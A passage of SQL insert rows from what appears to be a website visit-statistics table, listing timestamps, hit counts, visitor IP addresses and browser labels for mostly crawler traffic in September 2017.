(158797,1506004560,1,1,0,0,'217.182.132.181','other'),(158798,1506004804,1,1,0,0,'217.182.132.50','other'),(158799,1506004944,1,1,0,0,'37.110.33.138','other'),(158800,1506004946,1,1,0,0,'46.242.68.127','other'),(158801,1506005424,1,1,0,0,'217.182.132.71','other'),(158802,1506006135,1,1,0,0,'91.209.11.236','other'),(158803,1506006664,1,1,0,0,'137.74.207.170','other'),(158804,1506006847,1,1,0,0,'217.182.132.78','other'),(158805,1506006931,1,1,0,0,'216.244.66.237','other'),(158806,1506006948,1,1,0,0,'137.74.207.164','other'),(158807,1506007134,1,1,0,0,'51.255.65.50','other'),(158808,1506007355,1,1,0,0,'5.45.207.64','other'),(158809,1506007403,1,1,0,0,'217.182.132.25','other'),(158810,1506007479,1,1,0,0,'217.182.132.86','other'),(158811,1506007838,1,1,0,0,'66.249.66.199','chrome'),(158812,1506007966,1,1,0,0,'51.255.65.21','other'),(158813,1506008079,1,1,0,0,'217.182.132.50','other'),(158814,1506008533,1,1,0,0,'51.255.65.36','other'),(158815,1506008984,1,1,0,0,'8.29.198.25','other'),(158816,1506009195,1,1,0,0,'51.255.71.129','other'),(158817,1506009326,1,1,0,0,'217.182.132.29','other'),(158818,1506009433,1,1,0,0,'217.182.132.155','other'),(158819,1506009883,2,2,0,0,'216.244.66.237','other'),(158820,1506009985,1,1,0,0,'178.154.171.75','other'),(158821,1506010079,1,1,0,0,'217.182.132.151','other'),(158822,1506010109,1,1,0,0,'217.182.132.15','other'),(158823,1506010122,1,1,0,0,'164.132.162.155','other'),(158824,1506010249,1,1,0,0,'51.255.71.117','other'),(158825,1506010529,1,1,0,0,'217.182.132.84','other'),(158826,1506010934,1,1,0,0,'51.255.65.77','other'),(158827,1506011049,1,1,0,0,'217.182.132.5','other'),(158828,1506011321,1,1,0,0,'217.182.132.154','other'),(158829,1506011447,1,1,0,0,'51.255.65.7','other'),(158830,1506011652,1,1,0,0,'164.132.162.156','other'),(158831,1506011969,1,1,0,0,'164.132.162.159','other'),(158832,1506012026,1,1,0,0,'51.255.65.91','other'),(158833,1506012143,1,1,0,0,'217.182.132.180','other'),(158834,1506012943,1,1,0,0,'91.196.178.130','chrome'),(158835,1506013686,1,1,0,0,'5.45.207.64','other'),(158836,1506013703,1,1,0,0,'92.112.249.182','chrome'),(158837,1506013874,1,1,0,0,'217.182.132.92','other'),(158838,1506013976,1,1,0,0,'91.209.11.236','other'),(158839,1506014214,1,1,0,0,'217.182.132.68','other'),(158840,1506014568,1,1,0,0,'164.132.162.154','other'),(158841,1506014875,1,1,0,0,'5.45.207.9','other'),(158842,1506015028,1,1,0,0,'91.196.178.34','chrome'),(158843,1506015357,1,1,0,0,'46.42.167.138','chrome'),(158844,1506015553,1,1,0,0,'217.182.132.68','other'),(158845,1506015621,1,1,0,0,'167.114.158.57','other'),(158846,1506015646,1,1,0,0,'167.114.158.57','chrome'),(158847,1506015705,1,1,0,0,'51.255.71.120','other'),(158848,1506015876,1,1,0,0,'51.255.65.17','other'),(158849,1506015882,1,1,0,0,'91.209.11.236','other'),(158850,1506015944,1,1,0,0,'137.74.207.109','other'),(158851,1506016132,1,1,0,0,'185.137.18.138','chrome'),(158852,1506016284,1,1,0,0,'5.45.207.64','other'),(158853,1506016367,1,1,0,0,'51.255.65.51','other'),(158854,1506016536,1,1,0,0,'180.76.15.31','other'),(158855,1506017110,1,1,0,0,'91.209.11.236','other'),(158856,1506017546,1,1,0,0,'51.255.65.53','other'),(158857,1506017829,1,1,0,0,'5.45.207.64','other'),(158858,1506018030,1,1,0,0,'37.9.113.87','other'),(158859,1506018113,1,1,0,0,'51.255.65.92','other'),(158860,1506018135,1,1,0,0,'137.74.207.109','other'),(158861,1506018236,1,1,0,0,'217.182.132.186','other'),(158862,1506018401,1,1,0,0,'5.45.207.9','other'),(158863,1506018405,2,2,0,0,'51.255.65.25','other'),(158864,1506018491,1,1,0,0,'54.165.59.7','other'),(158865,1506018552,1,1,0,0,'51.255.71.131','other'),(158866,1506018785,1,1,0,0,'51.255.65.7','other'),(158867,1506018883,1,1,0,0,'51.255.65.32','other'),(158868,1506018951,2,2,0,0,'216.244.66.237','other'),(158869,1506019102,1,1,0,0,'46.211.204.176','chrome'),(158870,1506019178,1,1,0,0,'217.182.132.36','other'),(158871,1506019250,1,1,0,0,'217.182.132.241','other'),(158872,1506019280,1,1,0,0,'176.31.231.10','other'),(158873,1506019308,1,1,0,0,'217.182.132.67','other'),(158874,1506019481,3,3,0,0,'204.12.226.26','other'),(158875,1506019728,1,1,0,0,'51.255.65.27','other'),(158876,1506019776,1,1,0,0,'217.182.132.187','other'),(158877,1506019816,1,1,0,0,'8.29.198.26','other'),(158878,1506020373,1,1,0,0,'51.255.65.46','other'),(158879,1506020462,1,0,1,0,'68.180.228.221',''),(158880,1506020798,1,1,0,0,'217.182.132.80','other'),(158881,1506021230,1,1,0,0,'93.73.56.130','chrome'),(158882,1506021493,1,1,0,0,'51.255.65.29','other'),(158883,1506021501,1,1,0,0,'91.209.11.236','other'),(158884,1506021752,1,1,0,0,'216.244.66.237','other'),(158885,1506022475,1,1,0,0,'217.182.132.148','other'),(158886,1506022513,1,1,0,0,'91.209.11.236','other'),(158887,1506022752,1,1,0,0,'217.182.132.153','other'),(158888,1506023456,1,1,0,0,'51.255.65.19','other'),(158889,1506023504,2,2,0,0,'91.209.11.236','other'),(158890,1506023870,1,1,0,0,'164.132.162.153','other'),(158891,1506024097,1,1,0,0,'217.182.132.72','other'),(158892,1506024185,1,1,0,0,'37.9.113.188','other'),(158893,1506024283,1,1,0,0,'51.255.65.77','other'),(158894,1506024340,1,1,0,0,'5.45.207.64','other'),(158895,1506025063,1,1,0,0,'217.182.132.35','other'),(158896,1506025347,1,1,0,0,'5.45.207.9','other'),(158897,1506025382,1,1,0,0,'217.182.132.151','other'),(158898,1506025413,1,1,0,0,'51.255.71.123','other'),(158899,1506025555,2,2,0,0,'91.209.11.236','other'),(158900,1506025743,1,1,0,0,'207.46.13.163','other'),(158901,1506026008,1,1,0,0,'217.182.132.80','other'),(158902,1506026055,1,1,0,0,'5.45.207.64','other'),(158903,1506026072,1,1,0,0,'51.255.65.62','other'),(158904,1506026077,1,1,0,0,'137.74.201.108','other'),(158905,1506026129,1,1,0,0,'217.182.132.86','other'),(158906,1506026214,1,1,0,0,'217.182.132.173','other'),(158907,1506026270,1,1,0,0,'164.132.164.180','other'),(158908,1506026693,1,1,0,0,'51.255.65.55','other'),(158909,1506026995,1,1,0,0,'37.9.113.87','other'),(158910,1506027054,1,1,0,0,'51.255.71.114','other'),(158911,1506027066,1,1,0,0,'51.255.65.83','other'),(158912,1506027196,1,1,0,0,'5.45.207.64','other'),(158913,1506027578,1,1,0,0,'66.249.66.199','chrome'),(158914,1506027809,1,1,0,0,'137.74.207.170','other'),(158915,1506028024,1,1,0,0,'5.45.207.9','other'),(158916,1506028394,1,1,0,0,'217.182.132.178','other'),(158917,1506028915,1,1,0,0,'51.255.65.48','other'),(158918,1506029244,1,0,1,0,'66.249.66.75',''),(158919,1506029382,1,1,0,0,'157.55.39.167','other'),(158920,1506029448,3,3,0,0,'5.45.207.64','other'),(158921,1506029627,1,1,0,0,'207.46.13.112','other'),(158922,1506029821,1,1,0,0,'51.255.65.17','other'),(158923,1506029861,1,1,0,0,'51.255.65.64','other'),(158924,1506029867,1,1,0,0,'51.255.65.59','other'),(158925,1506030644,1,1,0,0,'8.29.198.26','other'),(158926,1506030767,1,1,0,0,'217.182.132.71','other'),(158927,1506031193,1,1,0,0,'5.45.207.9','other'),(158928,1506031285,1,1,0,0,'5.45.207.64','other'),(158929,1506031340,1,1,0,0,'164.132.162.187','other'),(158930,1506031734,1,1,0,0,'51.255.65.91','other'),(158931,1506031779,1,1,0,0,'51.255.65.83','other'),(158932,1506031875,1,1,0,0,'217.182.132.80','other'),(158933,1506031890,1,1,0,0,'51.255.71.112','other'),(158934,1506031953,1,1,0,0,'178.154.171.75','other'),(158935,1506032184,1,1,0,0,'217.182.132.183','other'),(158936,1506032957,1,1,0,0,'51.255.71.112','other'),(158937,1506033274,2,2,0,0,'91.209.11.236','other'),(158938,1506033493,1,1,0,0,'217.182.132.92','other'),(158939,1506033673,1,1,0,0,'164.132.162.164','other'),(158940,1506034133,1,1,0,0,'137.74.207.101','other'),(158941,1506034159,1,1,0,0,'158.255.132.5','chrome'),(158942,1506035181,1,1,0,0,'217.182.132.154','other'),(158943,1506035303,1,1,0,0,'217.182.132.15','other'),(158944,1506035452,1,1,0,0,'91.209.11.236','other'),(158945,1506035686,1,1,0,0,'217.182.132.68','other'),(158946,1506035741,1,1,0,0,'51.255.65.53','other'),(158947,1506035750,1,1,0,0,'137.74.207.101','other'),(158948,1506035962,1,1,0,0,'217.182.132.180','other'),(158949,1506036030,1,1,0,0,'51.255.65.13','other'),(158950,1506036050,1,1,0,0,'217.182.132.5','other'),(158951,1506036218,1,1,0,0,'217.182.132.73','other'),(158952,1506036317,1,0,1,0,'66.249.66.74',''),(158953,1506036827,1,1,0,0,'51.255.65.36','other'),(158954,1506037505,1,1,0,0,'217.182.132.192','other'),(158955,1506037819,1,1,0,0,'151.80.27.118','other'),(158956,1506037826,1,1,0,0,'5.45.207.64','other'),(158957,1506038083,1,1,0,0,'217.182.132.153','other'),(158958,1506038348,1,1,0,0,'217.182.132.62','other'),(158959,1506038391,1,1,0,0,'137.74.207.108','other'),(158960,1506038522,1,1,0,0,'164.132.162.164','other'),(158961,1506038876,1,1,0,0,'91.209.11.236','other'),(158962,1506039322,1,1,0,0,'217.182.132.87','other'),(158963,1506039646,1,1,0,0,'217.182.132.78','other'),(158964,1506039768,1,1,0,0,'51.255.65.61','other'),(158965,1506039805,1,1,0,0,'51.255.71.127','other'),(158966,1506040626,1,1,0,0,'217.182.132.171','other'),(158967,1506040660,1,1,0,0,'51.255.65.80','other'),(158968,1506040705,1,1,0,0,'5.45.207.9','other'),(158969,1506040862,1,1,0,0,'37.9.113.75','other'),(158970,1506040957,1,1,0,0,'46.161.9.39','chrome'),(158971,1506041015,1,1,0,0,'51.255.65.20','other'),(158972,1506041289,1,0,1,0,'68.180.228.221',''),(158973,1506041425,1,1,0,0,'5.45.207.64','other'),(158974,1506041480,1,1,0,0,'8.29.198.26','other'),(158975,1506042359,1,1,0,0,'217.182.132.191','other'),(158976,1506042527,1,0,1,0,'68.180.228.221',''),(158977,1506042644,1,1,0,0,'51.255.71.114','other'),(158978,1506042700,1,1,0,0,'217.69.133.9','other'),(158979,1506042964,1,1,0,0,'5.45.207.9','other'),(158980,1506043194,1,1,0,0,'51.255.65.66','other'),(158981,1506043343,1,1,0,0,'164.132.162.153','other'),(158982,1506043581,1,1,0,0,'217.182.132.27','other'),(158983,1506043597,2,2,0,0,'164.132.164.180','other'),(158984,1506043683,1,1,0,0,'5.45.207.64','other'),(158985,1506043744,1,0,1,0,'68.180.228.221',''),(158986,1506043869,1,1,0,0,'137.74.207.159','other'),(158987,1506043941,2,2,0,0,'217.182.132.155','other'),(158988,1506043952,1,1,0,0,'95.108.213.20','other'),(158989,1506044005,1,1,0,0,'5.45.207.9','other'),(158990,1506044065,1,1,0,0,'164.132.162.160','other'),(158991,1506044640,1,1,0,0,'216.244.66.237','other'),(158992,1506044892,1,1,0,0,'51.255.71.132','other'),(158993,1506045538,1,1,0,0,'217.182.132.186','other'),(158994,1506045738,1,0,1,0,'68.180.228.221',''),(158995,1506045813,2,2,0,0,'178.154.171.75','other'),(158996,1506046175,2,2,0,0,'164.132.162.155','other'),(158997,1506046441,7,7,0,0,'88.198.19.164','other'),(158998,1506046470,1,1,0,0,'217.182.132.97','other'),(158999,1506046557,1,1,0,0,'217.182.132.82','other'),(159000,1506046582,1,1,0,0,'91.209.11.236','other'),(159001,1506046763,1,1,0,0,'217.182.132.63','other'),(159002,1506046803,1,1,0,0,'217.182.132.153','other'),(159003,1506046937,1,1,0,0,'51.255.65.44','other'),(159004,1506047186,1,1,0,0,'51.255.65.48','other'),(159005,1506047400,1,1,0,0,'51.255.65.31','other'),(159006,1506047615,2,0,2,0,'68.180.228.221',''),(159007,1506048008,1,1,0,0,'217.182.132.50','other'),(159008,1506048101,1,1,0,0,'217.182.132.186','other'),(159009,1506048146,1,1,0,0,'91.209.11.236','other'),(159010,1506048219,2,2,0,0,'164.132.164.180','other'),(159011,1506048982,1,1,0,0,'217.182.132.55','other'),(159012,1506049240,1,1,0,0,'51.255.65.25','other'),(159013,1506049249,1,1,0,0,'51.255.65.51','other'),(159014,1506049407,1,1,0,0,'51.255.65.91','other'),(159015,1506049413,1,1,0,0,'51.255.65.3','other'),(159016,1506049478,1,1,0,0,'217.182.132.82','other'),(159017,1506049643,1,1,0,0,'217.182.132.84','other'),(159018,1506049964,1,1,0,0,'51.255.71.121','other'),(159019,1506050058,2,2,0,0,'216.244.66.237','other'),(159020,1506050158,1,1,0,0,'137.74.201.100','other'),(159021,1506050245,1,1,0,0,'141.8.132.34','other'),(159022,1506050318,1,1,0,0,'51.255.65.14','other'),(159023,1506050436,1,1,0,0,'217.182.132.28','other'),(159024,1506050791,1,1,0,0,'217.182.132.149','other'),(159025,1506051004,2,2,0,0,'137.74.207.114','other'),(159026,1506051292,1,1,0,0,'217.182.132.183','other'),(159027,1506051527,1,1,0,0,'178.154.171.9','other'),(159028,1506051530,1,1,0,0,'141.8.183.38','other'),(159029,1506051539,1,1,0,0,'217.182.132.63','other'),(159030,1506051554,1,1,0,0,'217.182.132.97','other'),(159031,1506051567,1,1,0,0,'137.74.207.120','other'),(159032,1506052311,1,1,0,0,'8.29.198.25','other'),(159033,1506052455,1,1,0,0,'137.74.207.109','other'),(159034,1506052476,1,1,0,0,'51.255.71.122','other'),(159035,1506052805,6,6,0,0,'46.229.168.75','other'),(159036,1506052823,4,4,0,0,'46.229.168.79','other'),(159037,1506052845,3,3,0,0,'46.229.168.71','other'),(159038,1506052860,2,2,0,0,'46.229.168.67','other'),(159039,1506052896,5,5,0,0,'46.229.168.73','other'),(159040,1506052950,1,1,0,0,'180.76.15.157','other'),(159041,1506052957,5,5,0,0,'46.229.168.78','other'),(159042,1506052991,1,1,0,0,'216.244.66.237','other'),(159043,1506053005,5,5,0,0,'46.229.168.65','other'),(159044,1506053010,6,6,0,0,'46.229.168.66','other'),(159045,1506053023,2,2,0,0,'46.229.168.69','other'),(159046,1506053062,1,1,0,0,'46.229.168.74','other'),(159047,1506053118,7,7,0,0,'46.229.168.77','other'),(159048,1506053183,9,9,0,0,'46.229.168.72','other'),(159049,1506053251,1,1,0,0,'51.255.65.75','other'),(159050,1506053305,1,1,0,0,'217.182.132.83','other'),(159051,1506053319,6,6,0,0,'46.229.168.80','other'),(159052,1506053334,7,7,0,0,'46.229.168.70','other'),(159053,1506053498,3,3,0,0,'46.229.168.76','other'),(159054,1506053605,1,1,0,0,'46.161.9.39','chrome'),(159055,1506053679,1,1,0,0,'217.182.132.241','other'),(159056,1506053810,4,4,0,0,'46.229.168.68','other'),(159057,1506053852,8,8,0,0,'46.229.168.67','other'),(159058,1506054064,6,6,0,0,'46.229.168.66','other'),(159059,1506054069,2,2,0,0,'46.229.168.65','other'),(159060,1506054078,1,1,0,0,'51.255.65.76','other'),(159061,1506054085,4,4,0,0,'46.229.168.75','other'),(159062,1506054124,5,5,0,0,'46.229.168.72','other'),(159063,1506054165,3,3,0,0,'46.229.168.74','other'),(159064,1506054237,8,8,0,0,'46.229.168.70','other'),(159065,1506054259,4,4,0,0,'46.229.168.77','other'),(159066,1506054376,3,3,0,0,'46.229.168.78','other'),(159067,1506054383,4,4,0,0,'46.229.168.79','other'),(159068,1506054430,2,2,0,0,'46.229.168.80','other'),(159069,1506054466,3,3,0,0,'46.229.168.71','other'),(159070,1506054591,1,1,0,0,'51.255.65.41','other'),(159071,1506054665,3,3,0,0,'46.229.168.76','other'),(159072,1506054849,4,4,0,0,'46.229.168.69','other'),(159073,1506055008,1,1,0,0,'217.182.132.175','other'),(159074,1506055029,2,2,0,0,'46.229.168.65','other'),(159075,1506055069,2,2,0,0,'46.229.168.73','other'),(159076,1506055138,1,1,0,0,'46.229.168.75','other'),(159077,1506055409,1,1,0,0,'5.45.207.58','other'),(159078,1506055421,1,1,0,0,'141.8.142.90','other'),(159079,1506055427,1,1,0,0,'141.8.183.5','other'),(159080,1506055787,1,1,0,0,'87.250.224.118','other'),(159081,1506055824,1,1,0,0,'217.182.132.75','other'),(159082,1506055838,2,2,0,0,'216.244.66.237','other'),(159083,1506056597,1,1,0,0,'91.196.178.69','firefox'),(159084,1506056662,1,1,0,0,'217.182.132.7','other'),(159085,1506056755,1,1,0,0,'217.182.132.178','other'),(159086,1506056838,1,1,0,0,'91.209.11.236','other'),(159087,1506056892,1,1,0,0,'107.167.104.163','other'),(159088,1506057052,1,1,0,0,'217.182.132.15','other'),(159089,1506057378,1,1,0,0,'204.79.180.10','msie'),(159090,1506057707,1,1,0,0,'217.182.132.146','other'),(159091,1506057998,1,1,0,0,'217.182.132.63','other'),(159092,1506058070,1,1,0,0,'37.52.23.54','chrome'),(159093,1506058634,1,1,0,0,'51.255.65.7','other'),(159094,1506058891,1,1,0,0,'217.182.132.193','other'),(159095,1506059281,1,1,0,0,'5.45.207.9','other'),(159096,1506059327,1,1,0,0,'91.196.178.70','firefox'),(159097,1506059475,1,1,0,0,'54.165.59.7','other'),(159098,1506059593,1,1,0,0,'5.45.207.64','other'),(159099,1506060146,1,1,0,0,'51.255.71.113','other'),(159100,1506060211,1,1,0,0,'217.182.132.4','other'),(159101,1506060231,2,2,0,0,'91.196.178.69','firefox'),(159102,1506060288,1,1,0,0,'107.167.108.92','opera'),(159103,1506060639,1,1,0,0,'51.255.65.29','other'),(159104,1506060879,1,1,0,0,'51.255.65.36','other'),(159105,1506061051,1,1,0,0,'91.209.11.236','other'),(159106,1506061123,1,1,0,0,'51.255.65.77','other'),(159107,1506061413,1,1,0,0,'37.9.113.87','other'),(159108,1506061471,1,1,0,0,'217.182.132.27','other'),(159109,1506062108,1,1,0,0,'216.244.66.237','other'),(159110,1506062440,1,1,0,0,'217.182.132.14','other'),(159111,1506062461,2,2,0,0,'91.209.11.236','other'),(159112,1506062716,1,1,0,0,'51.255.65.36','other'),(159113,1506062919,1,1,0,0,'91.196.178.132','firefox'),(159114,1506062947,1,1,0,0,'91.196.178.69','chrome'),(159115,1506063137,1,1,0,0,'8.29.198.25','other'),(159116,1506063194,1,1,0,0,'51.255.65.59','other'),(159117,1506063341,1,1,0,0,'217.182.132.72','other'),(159118,1506063364,1,1,0,0,'92.113.18.162','chrome'),(159119,1506063401,1,1,0,0,'5.45.207.9','other'),(159120,1506063688,1,1,0,0,'51.255.65.80','other'),(159121,1506063902,1,1,0,0,'51.255.65.47','other'),(159122,1506063947,1,1,0,0,'51.255.65.82','other'),(159123,1506063983,1,1,0,0,'91.196.178.70','chrome'),(159124,1506064386,1,1,0,0,'217.182.132.91','other'),(159125,1506064404,1,1,0,0,'151.80.27.116','other'),(159126,1506064409,1,1,0,0,'164.132.162.155','other'),(159127,1506064411,1,1,0,0,'5.45.207.9','other'),(159128,1506064431,1,1,0,0,'51.255.65.20','other'),(159129,1506064515,1,1,0,0,'137.74.201.108','other'),(159130,1506064624,1,1,0,0,'217.182.132.65','other'),(159131,1506064862,1,1,0,0,'51.255.65.26','other'),(159132,1506065072,11,11,0,0,'24.222.120.195','other'),(159133,1506065163,1,1,0,0,'217.182.132.156','other'),(159134,1506065245,2,2,0,0,'217.182.132.186','other'),(159135,1506065275,1,1,0,0,'216.244.66.237','other'),(159136,1506065419,1,1,0,0,'51.255.65.37','other'),(159137,1506065450,1,1,0,0,'51.255.65.90','other'),(159138,1506066050,1,1,0,0,'51.255.65.92','other'),(159139,1506066093,1,1,0,0,'217.182.132.36','other'),(159140,1506067015,1,1,0,0,'51.255.65.39','other'),(159141,1506067103,1,1,0,0,'217.182.132.70','other'),(159142,1506067421,1,1,0,0,'77.109.20.123','chrome'),(159143,1506067496,1,1,0,0,'1.121.148.143','firefox'),(159144,1506068110,1,1,0,0,'51.255.65.19','other'),(159145,1506068369,2,2,0,0,'5.45.207.64','other'),(159146,1506068652,1,1,0,0,'185.137.17.70','chrome'),(159147,1506069146,1,1,0,0,'91.196.178.68','chrome'),(159148,1506070170,1,1,0,0,'91.196.178.68','chrome'),(159149,1506070180,1,1,0,0,'51.255.65.38','other'),(159150,1506070289,1,1,0,0,'51.255.65.81','other'),(159151,1506070431,1,1,0,0,'216.244.66.237','other'),(159152,1506070829,1,1,0,0,'5.45.207.9','other'),(159153,1506071231,1,1,0,0,'217.182.132.75','other'),(159154,1506071343,1,1,0,0,'91.196.178.68','chrome'),(159155,1506071415,1,1,0,0,'91.209.11.236','other'),(159156,1506071439,1,1,0,0,'51.255.65.224','other'),(159157,1506071537,1,1,0,0,'137.74.207.101','other'),(159158,1506072011,1,1,0,0,'51.255.65.73','other'),(159159,1506072410,1,1,0,0,'157.55.39.165','other'),(159160,1506072420,4,4,0,0,'91.209.11.236','other'),(159161,1506072944,1,1,0,0,'217.182.132.177','other'),(159162,1506073205,1,1,0,0,'51.255.65.62','other'),(159163,1506073276,1,1,0,0,'217.182.132.146','other'),(159164,1506073369,1,1,0,0,'216.244.66.237','other'),(159165,1506073592,2,2,0,0,'91.209.11.236','other'),(159166,1506073682,1,1,0,0,'5.45.207.9','other'),(159167,1506073740,2,2,0,0,'176.121.250.55','other'),(159168,1506073891,1,1,0,0,'204.79.180.9','msie'),(159169,1506073912,1,1,0,0,'95.132.26.68','chrome'),(159170,1506073928,1,1,0,0,'107.167.104.196','other'),(159171,1506073969,1,1,0,0,'8.29.198.26','other'),(159172,1506074230,1,1,0,0,'51.255.65.10','other'),(159173,1506074444,1,1,0,0,'51.255.71.112','other'),(159174,1506074514,3,3,0,0,'91.209.11.236','other'),(159175,1506075071,1,1,0,0,'94.45.145.8','chrome'),(159176,1506075530,1,1,0,0,'217.182.132.53','other'),(159177,1506075691,1,1,0,0,'91.209.11.236','other'),(159178,1506075975,1,1,0,0,'51.255.65.61','other'),(159179,1506076400,1,1,0,0,'217.182.132.94','other'),(159180,1506077136,1,0,1,0,'66.249.66.199',''),(159181,1506077364,1,1,0,0,'66.102.9.27','chrome'),(159182,1506077614,1,1,0,0,'217.182.132.6','other'),(159183,1506078492,1,1,0,0,'207.46.13.163','other'),(159184,1506078769,1,1,0,0,'46.219.245.151','firefox'),(159185,1506078860,1,1,0,0,'5.45.207.64','other'),(159186,1506078939,1,0,1,0,'66.249.66.195',''),(159187,1506079026,1,1,0,0,'91.196.178.69','chrome'),(159188,1506079489,2,2,0,0,'91.209.11.236','other'),(159189,1506079630,1,1,0,0,'216.244.66.237','other'),(159190,1506079765,1,1,0,0,'51.255.65.77','other'),(159191,1506080304,1,1,0,0,'107.167.116.116','opera'),(159192,1506080310,1,1,0,0,'178.154.171.75','other'),(159193,1506080509,2,2,0,0,'91.209.11.236','other'),(159194,1506080683,1,1,0,0,'91.196.178.69','firefox'),(159195,1506081312,1,1,0,0,'217.182.132.154','other'),(159196,1506081364,1,0,1,0,'66.249.66.195',''),(159197,1506081529,1,0,1,0,'66.249.66.76',''),(159198,1506081838,1,1,0,0,'107.167.116.116','opera'),(159199,1506081909,2,2,0,0,'91.209.11.236','other'),(159200,1506082049,1,0,1,0,'68.180.228.221',''),(159201,1506082289,1,1,0,0,'108.59.8.80','other'),(159202,1506082948,2,2,0,0,'91.209.11.236','other'),(159203,1506083053,1,0,1,0,'66.249.66.199',''),(159204,1506083083,1,1,0,0,'216.244.66.237','other'),(159205,1506083596,1,1,0,0,'217.182.132.174','other'),(159206,1506083804,1,0,1,0,'66.249.66.76',''),(159207,1506084143,1,1,0,0,'91.209.11.236','other'),(159208,1506084279,1,1,0,0,'46.200.121.164','firefox'),(159209,1506084291,1,1,0,0,'137.74.207.101','other'),(159210,1506084476,1,1,0,0,'217.182.132.4','other'),(159211,1506084690,1,1,0,0,'51.255.65.71','other'),(159212,1506084797,1,1,0,0,'8.29.198.26','other'),(159213,1506084809,2,2,0,0,'178.154.171.24','other'),(159214,1506084836,1,1,0,0,'107.167.116.116','opera'),(159215,1506085284,1,1,0,0,'51.255.71.128','other'),(159216,1506085319,1,1,0,0,'178.92.85.5','chrome'),(159217,1506085498,1,1,0,0,'178.92.85.59','chrome'),(159218,1506085697,1,1,0,0,'195.10.210.70','firefox'),(159219,1506085780,1,1,0,0,'91.196.178.163','chrome'),(159220,1506085850,1,1,0,0,'51.255.65.91','other'),(159221,1506085920,1,1,0,0,'5.45.207.87','other'),(159222,1506086036,1,1,0,0,'137.74.207.114','other'),(159223,1506086327,1,1,0,0,'216.244.66.237','other'),(159224,1506086478,1,1,0,0,'37.9.113.145','other'),(159225,1506086640,1,1,0,0,'207.46.13.112','other'),(159226,1506086780,1,0,1,0,'68.180.228.221',''),(159227,1506087528,1,1,0,0,'107.167.105.121','other'),(159228,1506087638,1,1,0,0,'217.182.132.172','other'),(159229,1506087661,1,1,0,0,'91.196.178.71','firefox'),(159230,1506087744,1,1,0,0,'51.255.71.101','other'),(159231,1506088232,1,1,0,0,'62.80.171.249','chrome'),(159232,1506088436,1,1,0,0,'91.209.11.236','other'),(159233,1506089813,1,1,0,0,'51.255.71.98','other'),(159234,1506090241,1,1,0,0,'207.46.13.112','other'),(159235,1506090861,1,1,0,0,'217.182.132.83','other'),(159236,1506090992,1,1,0,0,'91.196.178.39','chrome'),(159237,1506091023,1,1,0,0,'95.108.181.95','other'),(159238,1506091418,1,1,0,0,'51.255.65.33','other'),(159239,1506091673,1,1,0,0,'217.182.132.56','other'),(159240,1506091739,1,1,0,0,'212.26.135.75','chrome'),(159241,1506092195,1,1,0,0,'207.46.13.170','other'),(159242,1506092928,1,1,0,0,'217.182.132.146','other'),(159243,1506093510,1,1,0,0,'137.74.207.161','other'),(159244,1506094059,1,1,0,0,'51.255.65.3','other'),(159245,1506094170,1,1,0,0,'217.182.132.64','other'),(159246,1506094254,1,1,0,0,'51.255.65.7','other'),(159247,1506094336,1,1,0,0,'141.8.183.38','other'),(159248,1506094540,1,0,1,0,'66.249.66.201',''),(159249,1506094584,1,1,0,0,'141.8.142.90','other'),(159250,1506094788,2,2,0,0,'216.244.66.237','other'),(159251,1506095221,1,1,0,0,'217.182.132.76','other'),(159252,1506095626,1,1,0,0,'8.29.198.25','other'),(159253,1506096069,2,2,0,0,'91.209.11.236','other'),(159254,1506096073,1,1,0,0,'217.182.132.24','other'),(159255,1506096982,1,1,0,0,'217.182.132.184','other'),(159256,1506097244,1,1,0,0,'51.255.64.106','other'),(159257,1506097378,1,0,1,0,'66.249.66.201',''),(159258,1506097520,1,1,0,0,'92.112.229.22','firefox'),(159259,1506097538,1,1,0,0,'66.249.66.76','chrome'),(159260,1506097704,1,0,1,0,'66.249.66.195',''),(159261,1506097757,1,1,0,0,'51.255.65.96','other'),(159262,1506097854,3,3,0,0,'216.244.66.237','other'),(159263,1506098096,1,1,0,0,'217.182.132.53','other'),(159264,1506098150,1,1,0,0,'217.182.132.21','other'),(159265,1506098182,1,0,1,0,'66.249.66.199',''),(159266,1506098226,1,1,0,0,'91.209.11.236','other'),(159267,1506098240,1,1,0,0,'217.182.132.51','other'),(159268,1506098435,1,1,0,0,'37.9.113.75','other'),(159269,1506098569,1,1,0,0,'51.255.71.101','other'),(159270,1506099202,1,1,0,0,'51.255.65.49','other'),(159271,1506099804,1,0,1,0,'66.249.66.201',''),(159272,1506100296,1,1,0,0,'217.182.132.88','other'),(159273,1506100382,1,1,0,0,'37.9.113.119','other'),(159274,1506100783,1,1,0,0,'216.244.66.237','other'),(159275,1506100891,1,1,0,0,'51.255.65.52','other'),(159276,1506100901,1,1,0,0,'217.182.132.152','other'),(159277,1506101008,1,1,0,0,'91.196.178.69','chrome'),(159278,1506101275,1,1,0,0,'178.154.171.9','other'),(159279,1506101494,1,1,0,0,'217.182.132.63','other'),(159280,1506101569,1,1,0,0,'217.182.132.33','other'),(159281,1506101980,1,1,0,0,'51.255.65.73','other'),(159282,1506102131,1,1,0,0,'178.154.171.26','other'),(159283,1506102257,1,1,0,0,'46.211.7.160','chrome'),(159284,1506102568,1,1,0,0,'217.182.132.97','other'),(159285,1506103236,1,1,0,0,'5.45.207.64','other'),(159286,1506103694,1,1,0,0,'51.255.65.12','other'),(159287,1506103952,1,1,0,0,'51.255.65.38','other'),(159288,1506104235,1,1,0,0,'5.45.207.64','other'),(159289,1506104240,1,1,0,0,'51.255.65.66','other'),(159290,1506104401,1,1,0,0,'51.255.65.37','other'),(159291,1506104531,1,1,0,0,'217.182.132.60','other'),(159292,1506104803,2,2,0,0,'54.165.59.7','other'),(159293,1506104876,1,1,0,0,'217.182.132.53','other'),(159294,1506105115,1,1,0,0,'51.255.65.92','other'),(159295,1506105206,1,1,0,0,'217.182.132.171','other'),(159296,1506105333,1,1,0,0,'107.167.116.116','opera'),(159297,1506105484,1,0,1,0,'66.249.66.201',''),(159298,1506105597,1,1,0,0,'37.73.227.195','chrome'),(159299,1506105655,1,1,0,0,'5.45.207.64','other'),(159300,1506105753,1,1,0,0,'137.74.201.108','other'),(159301,1506106330,1,1,0,0,'51.255.65.74','other'),(159302,1506106454,1,1,0,0,'8.29.198.26','other'),(159303,1506106467,1,1,0,0,'51.255.71.113','other'),(159304,1506106563,1,1,0,0,'216.244.66.237','other'),(159305,1506107055,1,1,0,0,'51.255.65.87','other'),(159306,1506107209,1,1,0,0,'217.182.132.28','other'),(159307,1506107639,1,1,0,0,'178.154.171.75','other'),(159308,1506107643,1,1,0,0,'5.45.207.64','other'),(159309,1506107950,1,1,0,0,'157.55.39.66','other'),(159310,1506108467,1,1,0,0,'217.182.132.56','other'),(159311,1506108783,1,1,0,